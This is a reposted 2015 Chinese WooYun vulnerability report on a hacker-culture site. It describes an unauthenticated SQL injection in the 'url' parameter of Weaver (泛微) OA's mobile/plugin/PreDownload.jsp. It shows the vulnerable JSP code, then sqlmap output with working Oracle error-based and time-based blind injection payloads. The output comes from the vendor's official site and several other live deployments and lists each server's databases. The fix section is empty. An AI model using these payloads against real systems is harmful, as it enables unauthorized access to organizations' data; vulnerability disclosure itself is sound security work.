记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

泛微OA通用系统存在SQL注入漏洞(官网可复现无需登录)

2015-12-10 05:45

问题出在mobile\plugin中的PreDownload.jsp文件



其中

code 区域
String url = StringHelper.null2String(request.getParameter("url"));

String sessionkey = StringHelper.null2String(request.getParameter("sessionkey"));

MpluginServiceImpl pluginService = (MpluginServiceImpl)BaseContext.getBean("mpluginServiceImpl");

if(pluginService.verify(sessionkey)) {



String filepath = "";

String iszip = "";

String filename = "";



String hashcode = "";



if (!StringHelper.isEmpty(url)) {



DataService ds = new DataService();



String sql = "select objname,filetype,filedir,iszip from attach where id = '"

+ url+"'";



Map dataMap = ds.getValuesForMap(sql);



if (!dataMap.isEmpty()) {



filepath = StringHelper.null2String(dataMap.get("filedir"));

iszip = StringHelper.null2String(dataMap.get("iszip"));

filename = StringHelper.null2String(dataMap.get("objname"));



} else {

filepath = request.getRealPath(url);

}

} else {

filepath = request.getRealPath(url);

iszip = "0";

filename = filepath.substring(filepath.lastIndexOf("/")+1);

}





这里对url并没有过滤



可能导致sql注入



这里我们首先以官方为例



http://**.**.**.**:9085/mobile/plugin/PreDownload.jsp?url=1



选区_298.png





选区_299.png







直接sqlmap

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: url (GET)

Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: url=1' AND 5516=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (5516=5516) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'DXjL'='DXjL



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: url=1' AND 7465=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(71)||CHR(103)||CHR(119),5) AND 'iLzy'='iLzy

---





数据库



code 区域
available databases [37]:

[*] CTXSYS

[*] DBSNMP

[*] DMSYS

[*] EWEAVER

[*] EWEAVER5TEST

[*] EWEAVERINHOUSE

[*] EWEAVERTEST

[*] EXFSYS

[*] FTOA01

[*] FTPOM

[*] HR

[*] HTF

[*] IX

[*] MDSYS

[*] MOBILEDEMO

[*] OE

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] PM

[*] PMECOLOGY

[*] POWER

[*] POWER01

[*] SCOTT

[*] SH

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TSMSYS

[*] WEAVERIM

[*] WFPM

[*] WMSYS

[*] XDB

[*] ZTDBA

[*] ZTKG

[*] ZZB

[*] ZZBMIS3





与http://**.**.**.**/bugs/wooyun-2015-0124589中的一致





漏洞证明:

再举几个案例



http://**.**.**.**/mobile/plugin/PreDownload.jsp?url=1



code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: url (GET)

Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: url=1' AND 9725=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (9725=9725) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'byuN'='byuN



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: url=1' AND 8995=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(68)||CHR(105)||CHR(97),5) AND 'TiYk'='TiYk

---

[22:57:56] [INFO] the back-end DBMS is Oracle

web application technology: JSP

back-end DBMS: Oracle





数据库

code 区域
available databases [21]:

[*] APEX_030200

[*] APPQOSSYS

[*] CTXSYS

[*] DBSNMP

[*] EWEAVER

[*] EXFSYS

[*] FLOWS_FILES

[*] MDSYS

[*] OAWEIFU

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] SCOTT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WEIFU

[*] WMSYS

[*] XDB







http://**.**.**.**//mobile/plugin/PreDownload.jsp?url=1





code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: url (GET)

Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: url=1' AND 3519=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (3519=3519) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'qKYb'='qKYb



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: url=1' AND 8926=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(99)||CHR(78)||CHR(71),5) AND 'ejvi'='ejvi

---





数据库



code 区域
available databases [19]:

[*] APEX_030200

[*] APPQOSSYS

[*] CTXSYS

[*] DBSNMP

[*] EWEAVER

[*] EXFSYS

[*] FLOWS_FILES

[*] MDSYS

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] SCOTT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] XDB







http://10.0.0.*/mobile/plugin/PreDownload.jsp?url=1

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: url (GET)

Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)

Payload: url=1' AND 2035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2035=2035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)) AND 'NyZn'='NyZn



Type: AND/OR time-based blind

Title: Oracle OR time-based blind

Payload: url=1' OR 9575=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(80)||CHR(117)||CHR(108),5) AND 'rioo'='rioo

---



数据库

code 区域
available databases [19]:

[*] APEX_030200

[*] APPQOSSYS

[*] CTXSYS

[*] DBSNMP

[*] EWEAVER

[*] EXFSYS

[*] FLOWS_FILES

[*] MDSYS

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] SCOTT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] XDB







http://**.**.**.**/mobile/plugin/PreDownload.jsp?url=1



code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: url (GET)

Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: url=1' AND 9799=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9799=9799) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'VxQf'='VxQf



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: url=1' AND 8957=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(66)||CHR(69)||CHR(74),5) AND 'lkVv'='lkVv

---

[23:18:02] [INFO] the back-end DBMS is Oracle

web application technology: JSP

back-end DBMS: Oracle







数据库



code 区域
available databases [28]:

[*] APEX_030200

[*] APPQOSSYS

[*] CTXSYS

[*] DBSNMP

[*] EWEAVER

[*] EWEAVERTEST

[*] EWEAVERTEST1

[*] EXFSYS

[*] FLOWS_FILES

[*] HR

[*] IX

[*] MDSYS

[*] MOBILE40

[*] MOBILE41

[*] OE

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] PM

[*] SCOTT

[*] SH

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] XDB









http://**.**.**.**//mobile/plugin/PreDownload.jsp?url=1%27



选区_301.png















修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0138725

阅读:402955 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“泛微OA通用系统存在SQL注入漏洞(官网可复现无需登录)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云